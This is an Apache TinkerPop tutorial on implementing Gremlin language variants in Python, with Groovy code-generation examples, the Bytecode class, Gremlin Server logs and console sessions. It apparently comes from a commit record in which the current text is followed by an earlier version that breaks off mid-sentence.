The language driver is the means by which, for this example, the CPython\nVM communicates with the JVM.\n\n[source,bash]\n----\n# sudo easy_install pip\n$ pip install gremlinpython\n----\n\nThe Groovy source code below uses Java reflection to generate a Python class that is in 1-to-1 correspondence with\nGremlin-Java.\n\n[source,groovy]\n----\nclass GraphTraversalSourceGenerator {\n\n public static void create(final String graphTraversalSourceFile) {\n\n final StringBuilder pythonClass = new StringBuilder()\n\n pythonClass.append(\"from .traversal import Traversal\\n\")\n pythonClass.append(\"from .traversal import TraversalStrategies\\n\")\n pythonClass.append(\"from .traversal import Bytecode\\n\")\n pythonClass.append(\"from ..driver.remote_connection import RemoteStrategy\\n\")\n pythonClass.append(\"from .. import statics\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversalSource \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversalSource(object):\n def __init__(self, graph, traversal_strategies, bytecode=None):\n self.graph = graph\n self.traversal_strategies = traversal_strategies\n if bytecode is None:\n bytecode = Bytecode()\n self.bytecode = bytecode\n def __repr__(self):\n return \"graphtraversalsource[\" + str(self.graph) + \"]\"\n\"\"\")\n GraphTraversalSource.getMethods(). \/\/ SOURCE STEPS\n findAll { GraphTraversalSource.class.equals(it.returnType) }.\n findAll {\n !it.name.equals(\"clone\") &&\n !it.name.equals(TraversalSource.Symbols.withRemote)\n }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.bytecode.add_source(\"${SymbolHelper.toJava(method)}\", *args)\n return source\n\"\"\")\n }\n pythonClass.append(\n \"\"\" def withRemote(self, remote_connection):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.traversal_strategies.add_strategies([RemoteStrategy(remote_connection)])\n return source\n\"\"\")\n GraphTraversalSource.getMethods(). 
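        \/\/ as above, reflect over GraphTraversalSource again, this time collecting the methods whose return type is GraphTraversal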
\/\/ SPAWN STEPS\n findAll { GraphTraversal.class.equals(it.returnType) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n traversal = GraphTraversal(self.graph, self.traversal_strategies, Bytecode(self.bytecode))\n traversal.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return traversal\n\"\"\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversal(Traversal):\n def __init__(self, graph, traversal_strategies, bytecode):\n Traversal.__init__(self, graph, traversal_strategies, bytecode)\n def __getitem__(self, index):\n if isinstance(index, int):\n return self.range(index, index + 1)\n elif isinstance(index, slice):\n return self.range(index.start, index.stop)\n else:\n raise TypeError(\"Index must be int or slice\")\n def __getattr__(self, key):\n return self.values(key)\n\"\"\")\n GraphTraversal.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { !it.name.equals(\"clone\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n self.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return self\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ AnonymousTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\"class __(object):\\n\");\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" @staticmethod\n def ${method}(*args):\n return GraphTraversal(None, None, Bytecode()).${method}(*args)\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n \/\/ add to gremlin.python.statics\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n findAll { !it.name.equals(\"__\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach {\n pythonClass.append(\"def ${it}(*args):\\n\").append(\" return __.${it}(*args)\\n\\n\")\n pythonClass.append(\"statics.add_static('${it}', ${it})\\n\\n\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/ save to a python file\n final File file = new File(graphTraversalSourceFile);\n file.delete()\n pythonClass.eachLine { file.append(it + \"\\n\") }\n }\n}\n----\n\nWhen the above Groovy script is evaluated (e.g. in GremlinConsole), **Gremlin-Python** is born. The generated Python\nfile is similar to the one available at\nlink:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python\/process\/graph_traversal.py[graph_traversal.py].\nIt is important to note that there is a bit more to Gremlin-Python in that there also exists Python implementations\nof `TraversalStrategies`, `Traversal`, `Bytecode`, etc. 
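To make the generator's output concrete, here is a sketch of what a single generated step method looks like, derived\nfrom the `GraphTraversal` template above (the real generated file contains one such method for every step, so the\nsnippet below is illustrative rather than complete):\n\n[source,python]\n----\nclass GraphTraversal(Traversal):\n    # ... constructor and magic methods as emitted by the generator ...\n    def out(self, *args):\n        self.bytecode.add_step(\"out\", *args)\n        return self\n----\n\nEach generated method simply appends a step instruction to the traversal's `Bytecode` and returns the traversal\nitself, which is what makes the fluent, chained style possible.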
Please review the full implementation of Gremlin-Python\nlink:https:\/\/github.com\/apache\/tinkerpop\/tree\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python[here].\n\nNOTE: In practice, TinkerPop uses Groovy's `GStringTemplateEngine` to help with the code generation task described\nabove and automates that generation as part of the standard build with Maven using the `gmavenplus-plugin`. See the\n`gremlin-python` link:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/pom.xml[pom.xml] for more details.\n\nOf particular importance is Gremlin-Python's implementation of `Bytecode`.\n\n[source,python]\n----\nclass Bytecode(object):\n    def __init__(self, bytecode=None):\n        self.source_instructions = []\n        self.step_instructions = []\n        self.bindings = {}\n        if bytecode is not None:\n            self.source_instructions = list(bytecode.source_instructions)\n            self.step_instructions = list(bytecode.step_instructions)\n\n    def add_source(self, source_name, *args):\n        newArgs = ()\n        for arg in args:\n            newArgs = newArgs + (self.__convertArgument(arg),)\n        self.source_instructions.append((source_name, newArgs))\n        return\n\n    def add_step(self, step_name, *args):\n        newArgs = ()\n        for arg in args:\n            newArgs = newArgs + (self.__convertArgument(arg),)\n        self.step_instructions.append((step_name, newArgs))\n        return\n\n    def __convertArgument(self, arg):\n        if isinstance(arg, Traversal):\n            self.bindings.update(arg.bytecode.bindings)\n            return arg.bytecode\n        elif isinstance(arg, tuple) and 2 == len(arg) and isinstance(arg[0], str):\n            self.bindings[arg[0]] = arg[1]\n            return Binding(arg[0], arg[1])\n        else:\n            return arg\n----\n\nAs `GraphTraversalSource` and `GraphTraversal` are manipulated, the step-by-step instructions are written to `Bytecode`.\nThis bytecode is simply a list of lists. For instance, `g.V(1).repeat(out('knows').hasLabel('person')).times(2).name` has\nthe `Bytecode` form:\n\n[source,json]\n----\n[\n  [\"V\", [1]],\n  [\"repeat\", [[[\"out\", [\"knows\"]],\n               [\"hasLabel\", [\"person\"]]]]],\n  [\"times\", [2]],\n  [\"values\", [\"name\"]]\n]\n----\n\nThis nested list representation is ultimately converted by the language variant into link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#graphson-reader-writer[GraphSON]\nfor serialization to a `RemoteConnection` such as GremlinServer.\n\n[source,bash]\n----\n$ bin\/gremlin-server.sh install org.apache.tinkerpop gremlin-python x.y.z\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern-py.yaml\n[INFO] GremlinServer -\n         \\,,,\/\n         (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern-py.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] GraphManager - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. 
Threads in pool named with pattern gremlin-*\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] Logger - 56 attributes loaded from 90 stream(s) in 21ms, 56 saved, 1150 ignored: [\"Ant-Version\", \"Archiver-Version\", \"Bnd-LastModified\", \"Boot-Class-Path\", \"Build-Jdk\", \"Build-Version\", \"Built-By\", \"Bundle-Activator\", \"Bundle-BuddyPolicy\", \"Bundle-ClassPath\", \"Bundle-Description\", \"Bundle-DocURL\", \"Bundle-License\", \"Bundle-ManifestVersion\", \"Bundle-Name\", \"Bundle-RequiredExecutionEnvironment\", \"Bundle-SymbolicName\", \"Bundle-Vendor\", \"Bundle-Version\", \"Can-Redefine-Classes\", \"Created-By\", \"DynamicImport-Package\", \"Eclipse-BuddyPolicy\", \"Export-Package\", \"Extension-Name\", \"Extension-name\", \"Fragment-Host\", \"Gremlin-Plugin-Dependencies\", \"Ignore-Package\", \"Implementation-Build\", \"Implementation-Title\", \"Implementation-URL\", \"Implementation-Vendor\", \"Implementation-Vendor-Id\", \"Implementation-Version\", \"Import-Package\", \"Include-Resource\", \"JCabi-Build\", \"JCabi-Date\", \"JCabi-Version\", \"Main-Class\", \"Main-class\", \"Manifest-Version\", \"Originally-Created-By\", \"Package\", \"Private-Package\", \"Require-Capability\", \"Specification-Title\", \"Specification-Vendor\", \"Specification-Version\", \"Tool\", \"Url\", \"X-Compile-Source-JDK\", \"X-Compile-Target-JDK\", \"hash\", \"version\"]\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] OpLoader - Adding the traversal OpProcessor.\n[INFO] TraversalOpProcessor - Initialized cache for TraversalOpProcessor with size 1000 and expiration time of 600000 ms\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Executed once at startup of Gremlin Server.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 4 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nWithin the CPython console, it is possible to evaluate the following.\n\n[source,python]\n----\nPython 2.7.2 (default, Oct 11 2012, 20:14:37)\n[GCC 4.2.1 Compatible Apple Clang 4.0 (tags\/Apple\/clang-418.0.60)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> from gremlin_python import statics\n>>> from gremlin_python.structure.graph import Graph\n>>> from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n# loading statics enables __.out() to be out() and P.gt() to be gt()\n>>> statics.load_statics(globals())\n>>> graph = Graph()\n>>> g = graph.traversal().withRemote(DriverRemoteConnection('ws:\/\/localhost:8182\/gremlin','g'))\n# nested traversal with Python slicing and attribute interception extensions\n>>> 
g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'marko', u'marko']\n>>> g = g.withComputer()\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'peter', u'peter']\n# a complex, nested multi-line traversal\n>>> g.V().match( \\\n... as_(\"a\").out(\"created\").as_(\"b\"), \\\n... as_(\"b\").in_(\"created\").as_(\"c\"), \\\n... as_(\"a\").out(\"knows\").as_(\"c\")). \\\n... select(\"c\"). \\\n... union(in_(\"knows\"),out(\"created\")). \\\n... name.toList()\n[u'ripple', u'marko', u'lop']\n>>>\n----\n\nIMPORTANT: Learn more about Apache TinkerPop's distribution of Gremlin-Python link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-python[here].\n\n[[gremlin-language-variant-conventions]]\n== Gremlin Language Variant Conventions\n\nEvery programming language is different and a Gremlin language variant must ride the fine line between leveraging the\nconventions of the host language and ensuring consistency with Gremlin-Java. A collection of conventions for navigating\nthis dual-language bridge are provided.\n\n* If camelCase is not an accepted method naming convention in the host language, then the host language's convention can be used instead. For instance, in a Gremlin-Ruby implementation, `outE(\"created\")` may be `out_e(\"created\")`.\n* If Gremlin-Java step names conflict with the host language's reserved words, then a consistent amelioration should be used. For instance, in Python `as` is a reserved word, thus, Gremlin-Python uses `as_`.\n* If the host language does not use dot-notion for method chaining, then its method chaining convention should be used instead of going the route of operator overloading. For instance, a Gremlin-PHP implementation should do `$g->V()->out()`.\n* If a programming language does not support method overloading, then varargs and type introspection should be used. In Gremlin-Python, `*args` does just that.\n\n== Conclusion\n\nGremlin is a simple language because it uses two fundamental programming language constructs: *function composition*\nand *function nesting*. Because of this foundation, it is relatively easy to implement Gremlin in any modern programming\nlanguage. Two ways of doing this for the Python language were presented in this tutorial. One using Jython (on the JVM) and one using Python\n(on CPython). It is strongly recommended that language variant designers leverage (especially when not on the JVM)\nthe reflection-based source code generation technique presented. This method ensures that the language\nvariant is always in sync with the corresponding Apache TinkerPop Gremlin-Java release version. Moreover, it reduces\nthe chance of missing methods or creating poorly implemented methods. While Gremlin is simple, there are nearly 200\nstep variations in `GraphTraversal`. As such, mechanical means of host language embedding are strongly advised.\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*x.y.z*\n\n== Gremlin Language Variants\n\nGremlin is an embeddable query language that can be represented using the constructs of a host programming language.\nAny programming language that supports link:https:\/\/en.wikipedia.org\/wiki\/Function_composition[function composition]\n(e.g. fluent chaining) and link:https:\/\/en.wikipedia.org\/wiki\/Nested_function[function nesting] (e.g. call stacks)\ncan support Gremlin. Nearly every modern programming language is capable of meeting both requirements.\nWith Gremlin, the distinction between a programming language and a query language is not as large as they\nhave historically been. For instance, with Gremlin-Java, the developer is able to have their application code and their\ngraph database queries at the same level of abstraction -- both written in Java. A simple example is presented below\nwhere the `MyApplication` Java class contains both application-level and database-level code written in Java.\n\nimage::gremlin-house-of-mirrors.png[width=1024]\n\nWARNING: This is an advanced tutorial intended for experts knowledgeable in Gremlin in particular and TinkerPop in general.\nMoreover, the audience should understand advanced programming language concepts such as reflection, meta-programming,\nsource code generation, and virtual machines.\n\n[source,java]\n----\npublic class MyApplication {\n\n public static void run(final String[] args) {\n\n \/\/ assumes args[0] is a configuration file location\n Graph graph = GraphFactory.open(args[0]);\n GraphTraversalSource g = graph.traversal();\n\n \/\/ assumes that args[1] and args[2] are range boundaries\n Iterator<Map<String,Double>> result =\n g.V().hasLabel(\"product\").\n order().by(\"unitPrice\", asc).\n range(Integer.valueOf(args[1]), Integer.valueOf(args[2])).\n valueMap(\"name\", \"unitPrice\")\n\n while(result.hasNext()) {\n Map<String,Double> map = result.next();\n System.out.println(map.get(\"name\") + \" \" + map.get(\"unitPrice\"));\n }\n }\n}\n----\n\nIn query languages like link:https:\/\/en.wikipedia.org\/wiki\/SQL[SQL], the user must construct a string representation of\ntheir query and submit it to the database for evaluation. This is because SQL cannot be expressed in Java as they use fundamentally\ndifferent constructs in their expression. The same example above is presented below using SQL and the\nlink:https:\/\/en.wikipedia.org\/wiki\/Java_Database_Connectivity[JDBC] interface. The take home point is that Gremlin does\nnot exist outside the programming language in which it will be used. 
Gremlin was designed to be able to be\nembedded in any modern programming language and thus, always free from the complexities of string manipulation as seen\nin other database and analytics query languages.\n\n[source,java]\n----\npublic class MyApplication {\n\n public static void run(final String[] args) {\n\n \/\/ assumes args[0] is a URI to the database\n Connection connection = DriverManager.getConnection(args[0])\n Statement statement = connection.createStatement();\n\n \/\/ assumes that args[1] and args[2] are range boundaries\n ResultSet result = statement.executeQuery(\n \"SELECT Products.ProductName, Products.UnitPrice \\n\" +\n \" FROM (SELECT ROW_NUMBER() \\n\" +\n \" OVER ( \\n\" +\n \" ORDER BY UnitPrice) AS [ROW_NUMBER], \\n\" +\n \" ProductID \\n\" +\n \" FROM Products) AS SortedProducts \\n\" +\n \" INNER JOIN Products \\n\" +\n \" ON Products.ProductID = SortedProducts.ProductID \\n\" +\n \" WHERE [ROW_NUMBER] BETWEEN \" + args[1] + \" AND \" + args[2] + \" \\n\" +\n \"ORDER BY [ROW_NUMBER]\"\n\n while(result.hasNext()) {\n result.next();\n System.out.println(result.getString(\"Products.ProductName\") + \" \" + result.getDouble(\"Products.UnitPrice\"));\n }\n }\n}\n----\n\nThe purpose of this tutorial is to explain how to develop a _Gremlin language variant_. That is, for those developers that\nare interested in supporting Gremlin in their native language and there currently does not exist a (good) Gremlin variant in\ntheir language, they can develop one for the Apache TinkerPop community (and their language community in general). In this\ntutorial, link:https:\/\/www.python.org\/[Python] will serve as the host language and two typical implementation models will be presented.\n\n1. <<using-jython-and-the-jvm,**Using Jython and the JVM**>>: This is perhaps the easiest way to produce a Gremlin\nlanguage variant. With link:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223], any language compiler written for the JVM\ncan directly access the JVM and any of its libraries (including Gremlin-Java).\n\n2. <<using-python-and-gremlin-server,**Using Python and GremlinServer**>>: This model requires that there exist a Python\nclass that mimics Gremlin-Java's `GraphTraversal` API. With each method call of this Python class, Gremlin `Bytecode` is\ngenerated which is ultimately translated into a Gremlin variant that can execute the traversal (e.g. Gremlin-Java).\n\nIMPORTANT: Apache TinkerPop's Gremlin-Java is considered the idiomatic, standard implementation of Gremlin.\nAny Gremlin language variant, regardless of the implementation model chosen, **must**, within the constraints of the\nhost language, be in 1-to-1 correspondence with Gremlin-Java. This ensures that language variants are collectively\nconsistent and easily leveraged by anyone versed in Gremlin.\n\nIMPORTANT: The \"Gremlin-Python\" presented in this tutorial is basic and provided to show the primary techniques used to\nconstruct a Gremlin language variant. Apache TinkerPop distributes with a full fledged Gremlin-Python variant\nthat uses many of the techniques presented in this tutorial.\n\n[[language-drivers-vs-language-variants]]\n== Language Drivers vs. Language Variants\n\nBefore discussing how to implement a Gremlin language variant in Python, it is necessary to understand two concepts related to\nGremlin language development. 
There is a difference between a _language driver_ and a _language variant_ and it is important\nthat these two concepts (and their respective implementations) remain separate.\n\n=== Language Drivers\n\nimage:language-drivers.png[width=375,float=right] A Gremlin language driver is a software library that is able to\ncommunicate with a TinkerPop-enabled graph system whether directly via the JVM or indirectly via\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-server[Gremlin Server] GremlinServer or some other\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connecting-via-remotegraph[RemoteConnection] enabled graph system.\nLanguage drivers are responsible for submitting Gremlin traversals to a TinkerPop-enabled graph system and\nreturning results to the developer that are within the developer's language's type system.\nFor instance, resultant doubles should be coerced to floats in Python.\n\nThis tutorial is not about language drivers, but about language variants. Moreover, community libraries should make this\ndistinction clear and **should not** develop libraries that serve both roles. Language drivers will be useful to a collection\nof Gremlin variants within a language community -- able to support `GraphTraversal`-variants as well as also other\nlink:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]-variants (e.g. `SocialTraversal`).\n\nNOTE: `GraphTraversal` is a particular Gremlin domain-specific language (link:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]),\nalbeit the most popular and foundational DSL. If another DSL is created, then the same techniques discussed in this tutorial\nfor `GraphTraversal` apply to `XXXTraversal`.\n\n=== Language Variants\n\nimage:language-variants.png[width=375,float=right] A Gremlin language variant is a software library that allows a developer\nto write a Gremlin traversal within their native programming language. The language variant is responsible for\ncreating Gremlin `Bytecode` that will ultimately be translated and compiled to a `Traversal` by a TinkerPop-enabled graph system.\n\nEvery language variant, regardless of the implementation details, will have to account for the four core concepts below:\n\n1. `Graph` (**data**): The source of the graph data to be traversed and the interface which enables the creation of a\n`GraphTraversalSource` (via `graph.traversal()`).\n\n2. `GraphTraversalSource` (**compiler**): This is the typical `g` reference. A `GraphTraversalSource` maintains the\n`withXXX()`-strategy methods as well as the \"traversal spawn\"-methods such as `V()`, `E()`, `addV()`, etc.\nA traversal source's registered `TraversalStrategies` determine how the submitted traversal will be ultimately evaluated.\n\n3. `GraphTraversal` (**function composition**): A graph traversal maintains the computational steps such as `out()`, `groupCount()`,\n`match()`, etc. This fluent interface supports method chaining and thus, a linear \"left-to-right\" representation of a traversal\/query.\n\n4. `__` (**function nesting**) : The anonymous traversal class is used for passing a traversal as an argument to a parent step.\nFor example, in `repeat(__.out())`, `__.out()` is an anonymous traversal passed to the traversal parent `repeat()`.\nAnonymous traversals enable the \"top-to-bottom\" representation of a traversal.\n\n5. `Bytecode` (**language agnostic encoding**): The source and traversal steps and their arguments are encoded in a\nlanguage agnostic representation called Gremlin bytecode. 
This representation is a nested list of the form `[step,[args*]]*`.\n\nBoth `GraphTraversal` and `__` define the structure of the Gremlin language. Gremlin is a _two-dimensional language_ supporting\nlinear, nested step sequences. Historically, many Gremlin language variants have failed to make the distinctions above clear\nand in doing so, either complicate their implementations or yield variants that are not in 1-to-1 correspondence with Gremlin-Java.\nBy keeping these concepts clear when designing a language variant, the construction of the Gremlin bytecode representation is\neasy.\n\nIMPORTANT: The term \"Gremlin-Java\" denotes the language that is defined by `GraphTraversalSource`, `GraphTraversal`,\nand `__`. These three classes exist in `org.apache.tinkerpop.gremlin.process.traversal.dsl.graph` and form the definitive\nrepresentation of the Gremlin traversal language.\n\n== Gremlin-Jython and Gremlin-Python\n\n[[using-jython-and-the-jvm]]\n=== Using Jython and the JVM\n\nimage:jython-logo.png[width=200,float=left,link=\"http:\/\/www.jython.org\/\"] link:http:\/\/www.jython.org\/[Jython] provides a\nlink:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223] `ScriptEngine` implementation that enables the evaluation of\nPython on the link:https:\/\/en.wikipedia.org\/wiki\/Java_virtual_machine[Java virtual machine]. In other words, Jython's\nvirtual machine is not the standard link:https:\/\/wiki.python.org\/moin\/CPython[CPython] reference implementation\ndistributed with most operating systems, but instead the JVM. The benefit of Jython is that Python code and classes\ncan easily interact with the Java API and any Java packages on the `CLASSPATH`. In general, any JSR-223 Gremlin language\nvariant is trivial to \"implement.\"\n\n[source,python]\n----\nJython 2.7.0 (default:9987c746f838, Apr 29 2015, 02:25:11)\n[Java HotSpot(TM) 64-Bit Server VM (Oracle Corporation)] on java1.8.0_40\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import sys\n# this list is longer than displayed, including all jars in lib\/, not just Apache TinkerPop jars\n# there is probably a more convenient way of importing jars in Jython though, at the time of writing, no better solution was found.\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-console-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-core-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-driver-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-shaded-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/ext\/tinkergraph-gremlin\/lib\/tinkergraph-gremlin-x.y.z.jar\")\n# import Java classes\n>>> from org.apache.tinkerpop.gremlin.tinkergraph.structure import TinkerFactory\n>>> from org.apache.tinkerpop.gremlin.process.traversal.dsl.graph import __\n>>> from org.apache.tinkerpop.gremlin.process.traversal import *\n>>> from org.apache.tinkerpop.gremlin.structure import *\n# create the toy \"modern\" graph and spawn a GraphTraversalSource\n>>> graph = TinkerFactory.createModern()\n>>> g = graph.traversal()\n# The Jython shell does not automatically iterate Iterators like the GremlinConsole\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\")\n[GraphStep(vertex,[]), HasStep([~label.eq(person)]), VertexStep(OUT,[knows],vertex), VertexStep(OUT,[created],vertex)]\n# 
toList() will do the iteration and return the results as a list\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\").toList()\n[v[5], v[3]]\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()\n[ripple, lop]\n# results can be interacted with using Python\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0]\nu'ripple'\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0][0:3].upper()\nu'RIP'\n>>>\n----\n\nMost every JSR-223 `ScriptEngine` language will allow the developer to immediately interact with `GraphTraversal`.\nThe benefit of this model is that nearly every major programming language has a respective `ScriptEngine`:\nlink:https:\/\/en.wikipedia.org\/wiki\/Nashorn_(JavaScript_engine)[JavaScript], link:http:\/\/groovy-lang.org\/[Groovy],\nlink:http:\/\/www.scala-lang.org\/[Scala], Lisp (link:https:\/\/clojure.org\/[Clojure]), link:http:\/\/jruby.org\/[Ruby], etc. A\nlist of implementations is provided link:https:\/\/en.wikipedia.org\/wiki\/List_of_JVM_languages[here].\n\n==== Traversal Wrappers\n\nWhile it is possible to simply interact with Java classes in a `ScriptEngine` implementation, such Gremlin language variants\nwill not leverage the unique features of the host language. It is for this reason that JVM-based language variants such as\nlink:https:\/\/github.com\/mpollmeier\/gremlin-scala[Gremlin-Scala] were developed. Scala provides many syntax niceties not\navailable in Java. To leverage these niceties, Gremlin-Scala \"wraps\" `GraphTraversal` in order to provide Scala-idiomatic extensions.\nAnother example is Apache TinkerPop's Gremlin-Groovy which does the same via the\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#sugar-plugin[Sugar plugin], but uses\nlink:http:\/\/groovy-lang.org\/metaprogramming.html[meta-programming] instead of object wrapping, where \"behind the scenes,\"\nGroovy meta-programming is doing object wrapping.\n\nThe Jython example below uses Python meta-programming to add functionality to `GraphTraversal`.\nIn particular, the `__getitem__` and `__getattr__` \"magic methods\" are leveraged.\n\n[source,python]\n----\ndef getitem_bypass(self, index):\n if isinstance(index,int):\n return self.range(index,index+1)\n elif isinstance(index,slice):\n return self.range(index.start,index.stop)\n else:\n return TypeError('Index must be int or slice')\");\nGraphTraversal.__getitem__ = getitem_bypass\nGraphTraversal.__getattr__ = lambda self, key: self.values(key)\n----\n\nThe two methods `__getitem__` and `__getattr__` support Python _slicing_ and _object attribute interception_, respectively.\nIn this way, the host language is able to use its native constructs in a meaningful way within a Gremlin traversal.\n\nIMPORTANT: Gremlin-Java serves as the standard\/default representation of the Gremlin traversal language. Any Gremlin\nlanguage variant **must** provide all the same functionality (methods) as `GraphTraversal`, but **can** extend it\nwith host language specific constructs. This means that the extensions **must** compile to `GraphTraversal`-specific\nsteps. A Gremlin language variant **should not** add steps\/methods that do not exist in `GraphTraversal`. 
If an extension\nis desired, the language variant designer should submit a proposal to link:http:\/\/tinkerpop.apache.org[Apache TinkerPop]\nto have the extension added to a future release of Gremlin.\n\n[[using-python-and-remoteconnection]]\n=== Using Python and RemoteConnection\n\nimage:python-logo.png[width=125,float=left,link=\"https:\/\/www.python.org\/\"] The JVM is a powerful piece of technology that has, over the years,\nbecome a meeting ground for developers from numerous language communities. However, not all applications will use the JVM.\nGiven that Apache TinkerPop is a Java-framework, there must be a way for two different virtual machines to communicate\ntraversals and their results. This section presents the second Gremlin language variant implementation model which does just that.\n\nNOTE: Apache TinkerPop is a JVM-based graph computing framework. Most graph databases and processors today are built\non the JVM. This makes it easy for these graph system providers to implement Apache TinkerPop. However, TinkerPop is more\nthan its graph API and tools -- it is also the Gremlin traversal machine and language. While Apache's Gremlin traversal\nmachine was written for the JVM, its constructs are simple and can\/should be ported to other VMs for those graph systems\nthat are not JVM-based. A theoretical review of the concepts behind the Gremlin traversal machine is provided in\nlink:http:\/\/arxiv.org\/abs\/1508.03843[this article].\n\nThis section's Gremlin language variant design model does not leverage the JVM directly. Instead, it constructs a `Bytecode`\nrepresentation of 